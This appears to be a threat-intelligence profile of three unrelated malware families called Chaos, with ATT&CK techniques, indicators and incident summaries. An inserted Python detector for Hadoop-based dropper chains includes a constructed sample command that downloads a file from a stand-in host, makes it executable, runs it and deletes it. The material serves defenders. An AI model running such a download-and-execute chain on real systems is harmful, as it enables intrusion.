Chaos
Chaos refers to multiple distinct malware families/operations in the provided content, so attribution must be handled carefully. The content most strongly supports three separate usages: (1) a ransomware builder/ransomware family monitored since June 2021; (2) a ransomware-as-a-service (RaaS) operation active since February 2025; and (3) a Go-based cross-platform botnet/malware family first documented in September 2022.
For the 2021-era ransomware family/builder, Chaos was described as an in-development ransomware builder offered for testing on an underground forum. Splunk reporting states it has been monitored since 2021, targets Windows systems and networks, can enforce single-instance execution, delay execution for defense evasion, establish persistence through the Windows registry and Startup folder, and copy itself to root drives and %appdata%. Related detection content associates it with behaviors such as file encryption activity, ransom note creation, deletion of shadow volume storage, registry modification, Startup-folder drops, removable-media/root-drive replication, and malicious .url shortcut creation. Fortinet reporting in the content describes a later C++ variant (“Chaos-C++”) targeting Windows that adds destructive capabilities, including irrevocable deletion/overwriting of large files rather than recoverable encryption and clipboard manipulation for cryptocurrency theft. The content also states that Onyx ransomware is based on Chaos ransomware.
For the 2025 RaaS operation, Chaos is described as a distinct ransomware-as-a-service group first observed in February 2025, likely composed of former BlackSuit/Royal members, with moderate-confidence reporting linking it to ex-BlackSuit/ex-Royal/Conti lineage. This operation uses an open affiliate model and has been described as conducting double extortion and, in some reporting, triple extortion by combining data theft, encryption, and DDoS threats. It mostly targets large organizations in the United States and is characterized as opportunistic big-game hunting. Reported intrusion patterns include spam flooding and voice phishing or Microsoft Teams/Quick Assist social engineering, use of remote management tools such as AnyDesk, ScreenConnect, OptiTune, Syncro RMM, Splashtop Streamer, and DWAgent, reverse SSH tunnels over port 443, credential theft with Mimikatz and Kerberoasting, lateral movement via RDP and Impacket, and exfiltration with GoodSync renamed to wininit.exe. Its encryptor reportedly supports Windows, Linux, ESXi, and NAS, uses Curve25519 ECDH and AES-256 with per-file unique keys, appends the .chaos extension, and drops README.chaos.txt/readme.chaos.txt ransom notes. The content also notes repeated false-flag use of Chaos branding by Iran-linked MuddyWater/MOIS activity in early 2026, where attackers used Chaos leak-site/extortion branding but did not deploy encryption.
For the 2022 botnet/malware family, Chaos was first documented by Lumen Black Lotus Labs in September 2022 as a Go-based cross-platform malware targeting Windows and Linux, historically focused on routers and edge devices. Reported capabilities include remote shell command execution, deployment of additional modules, SSH brute-force propagation, exploitation of known router CVEs, cryptocurrency mining, and DDoS attacks over HTTP, TLS, TCP, UDP, and WebSocket. Multiple reports assess it as likely an evolution of the Kaiji botnet. Newer 2026 variants expanded to misconfigured cloud/Linux server environments, including exploitation of misconfigured Hadoop instances by creating a malicious application that downloads and executes a Chaos binary, then deletes it from disk. Updated Linux ELF variants reportedly removed some older SSH spreading/router exploitation functions, retained persistence via systemd and keep-alive scripts, and added SOCKS/SOCKS5 proxy capability for traffic relaying and internal-network pivoting. Infrastructure and indicators mentioned in the content for this botnet variant include pan.tenire[.]com, gmserver.osfc[.]org[.]cn, port 65111, attacker IP 182[.]90.229.95, and sample hash ae457fc5e07195509f074fe45a6521e7fd9e4cd3cd43e42d10b0222b34f2de7a. Because the content conflates unrelated malware families sharing the same name, analysts should distinguish the 2021 Chaos ransomware/builder, the 2025 Chaos RaaS operation, and the 2022 Go-based Chaos botnet/malware family.
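The Hadoop abuse pattern described above (an application submission whose launch command fetches a binary, marks it world-writable and executable, runs it, then removes it) lends itself to a simple behavioural detection. The Python below is an added example, not code from the page or any cited vendor; the JSON field layout is an assumption modelled on YARN REST application submissions, and both log records are constructed samples.

```python
import json
import re
import shlex

# Assumption: each submission is logged as a JSON body with the launch command
# under am-container-spec.commands.command. Both records are constructed.
SAMPLE_SUBMISSIONS = [
    '{"application-id": "application_0001", "am-container-spec": {"commands": '
    '{"command": "$HADOOP_HOME/bin/hadoop jar wc.jar WordCount in out"}}}',
    '{"application-id": "application_0002", "am-container-spec": {"commands": '
    '{"command": "curl -fsSL http://dl.example.invalid/a -o /tmp/.a; '
    'chmod 777 /tmp/.a; /tmp/.a; rm -f /tmp/.a"}}}',
]
SPLIT = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")  # shell command separators

def classify_command(command):
    """Mark which stages of fetch -> chmod 777 -> execute -> delete appear,
    counting execute/delete only when they touch a file the chain dropped."""
    stages = dict(fetch=False, chmod777=False, execute=False, delete=False)
    dropped = set()
    for part in filter(None, map(str.strip, SPLIT.split(command))):
        try:
            argv = shlex.split(part)
        except ValueError:
            continue  # unbalanced quotes: leave this fragment unclassified
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog in ("curl", "wget"):
            stages["fetch"] = True
            for flag in ("-o", "-O", "--output"):
                if flag in argv[:-1]:
                    dropped.add(argv[argv.index(flag) + 1])
        elif prog == "chmod" and any(a.lstrip("0") == "777" for a in argv[1:]):
            stages["chmod777"] = True
            dropped.update(a for a in argv[1:]
                           if not a.startswith("-") and a.lstrip("0") != "777")
        elif prog == "rm" and dropped & set(argv[1:]):
            stages["delete"] = True
        elif argv[0] in dropped or (prog in ("sh", "bash") and argv[1:2] and argv[1] in dropped):
            stages["execute"] = True
    return stages

def is_dropper_chain(command):
    """Fetch and run a dropped file, plus chmod 777 or self-cleanup, is the page's pattern."""
    s = classify_command(command)
    return s["fetch"] and s["execute"] and (s["chmod777"] or s["delete"])

def scan_submissions(records):
    """Return application ids whose launch command matches the dropper chain."""
    flagged = []
    for raw in records:
        rec = json.loads(raw)
        cmd = rec.get("am-container-spec", {}).get("commands", {}).get("command", "")
        if is_dropper_chain(cmd):
            flagged.append(rec.get("application-id", "<unknown>"))
    return flagged

if __name__ == "__main__":
    print(scan_submissions(SAMPLE_SUBMISSIONS))  # ['application_0002']
```

A benign MapReduce submission has none of the stages, so the heuristic keys on the sequence rather than on any domain or hash and survives infrastructure rotation.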
Groups observed using it
3 distinct threat actors attributed by public researchers.
Nation-state hackers from Iran are deploying the Chaos ransomware as cover for alleged espionage and data theft operations... The Chaos ransomware operation has existed since February 2025...
A newly emerged ransomware-as-a-service (RaaS) gang called Chaos is likely made up of former members of the BlackSuit crew... Chaos, which sprang forth in February 2025...
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
One of the more interesting functions of Chaos version 1.0 was its worming function, which allowed it to spread to all drives found on an affected system. This could permit the malware to jump onto removable drives and escape from air-gapped systems.
Darktrace said it identified the new variant targeting its honeypot network last month, a deliberately misconfigured Hadoop instance that enables remote code execution on the service. In the attack spotted by the cybersecurity company, the intrusion commenced with an HTTP request to the Hadoop deployment to create a new application.
Execution
3 techniques
Chaos is a cross-platform malware that can run remote shell commands...
The application, for its part, embedded a sequence of shell commands to retrieve a Chaos agent binary from an attacker-controlled server ('pan.tenire[.]com'), set permissions to allow all users to read, modify, or run it ('chmod 777'), and then actually execute the binary and delete the artifact from disk to minimize the forensic trail.
One honeypot in that network runs Apache Hadoop, an open-source distributed data processing framework, deliberately misconfigured to allow remote code execution.
Persistence
1 technique
Privilege Escalation
1 technique
Stealth
2 techniques
Defense Impairment
1 technique
This application then retrieves a Chaos agent binary from an attacker-controlled server, sets permissions to allow execution, and runs the binary...
Credential Access
2 techniques
Chaos is a cross-platform malware that can run remote shell commands, deploy additional modules, propagate via SSH brute-forcing...
The internal namespace was restructured and several functions were rewritten or removed, including the SSH brute-forcing spreader...
Discovery
1 technique
For example, it searched the following file paths and extensions to infect: Directories \Contacts \Desktop \Documents \Downloads ...
Lateral Movement
3 techniques
It also has the kind of tradecraft defenders should not shrug off: social engineering, remote-management abuse, payload retrieval, staging, and leaked data.
Chaos was first documented by Lumen Black Lotus Labs in September 2022, describing it as a cross-platform malware capable of targeting Windows and Linux environments to run remote shell commands, drop additional modules, propagate to other hosts by brute-forcing SSH keys
Command and Control
5 techniques
The command-and-control server is reached through an embedded domain, gmserver[.]osfc[.]org[.]cn, which at the time of analysis resolved to an IP address geolocated to Hong Kong.
The new 64-bit ELF binary has removed SSH propagation and router exploit functions, replacing them with a SOCKS proxy feature to ferry traffic and conceal malicious activity.
When the malware receives a StartProxy command from the command-and-control (C2) server, it will begin listening on an attacker-controlled TCP port and operates as a SOCKS5 proxy.
Taking their place is a new SOCKS proxy feature that allows the compromised system to be used for ferrying traffic, thereby concealing the true origins of malicious activity and making it harder for defenders to detect and block the attack.
Exfiltration
2 techniques
Smyth Companies, LLC has failed to protect its infrastructure. We have successfully exfiltrated high...
We are announcing a major security breach and data exfiltration from Flad Architects...
Impact
6 techniques
Instead of encrypting files (which could then be decrypted after the target paid the ransom), it replaced the files’ contents with random bytes, after which the files were encoded in Base64. This meant that affected files could no longer be restored
With version 3.0, the Chaos ransomware builder gained the ability to encrypt files under 1 MB using AES/RSA encryption... The fourth iteration of Chaos expands the AES/RSA encryption by increasing the upper limit of files that can be encrypted to 2 MB.
The second version of Chaos added advanced options for administrator privileges, the ability to delete all volume shadow copies and the backup catalog, and the ability to disable Windows recovery mode.
In addition, it gives the ransomware builder’s users the ability to add their own extensions to affected files and the ability to change the desktop wallpaper of their victims.
Chaos is a cross-platform malware that can run remote shell commands, deploy additional modules, propagate via SSH brute-forcing, mine cryptocurrency, and launch DDoS attacks.
IOCs tracked for this family
88 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
46 sources tracked across advisories, community write-ups, and news.
Chaos is a ransomware-as-a-service operation associated with double-extortion attacks involving data exfiltration and file encryption. In the reported intrusion, its branding and artifacts were used as a false flag, but no encryption occurred.
Ransomware brand used as cover for espionage and data theft operations. In the described incident, attackers conducted social engineering via Microsoft Teams, gained access, stole data, extorted the victim, and notably did not encrypt files, suggesting use of the ransomware label to obscure attribution and operational intent.
A ransomware/RaaS brand used here as cover for extortion and leak-site pressure; in this incident it was presented as the apparent culprit, but investigators found no actual file encryption or ransomware deployment.
Chaos is a ransomware-as-a-service operation active since February 2025, specializing in big-game hunting attacks, double/triple/quadruple extortion, and targeting high-profile organizations. In this incident, its branding and extortion infrastructure were used as cover, while the operation itself did not follow a typical encryption-focused ransomware workflow.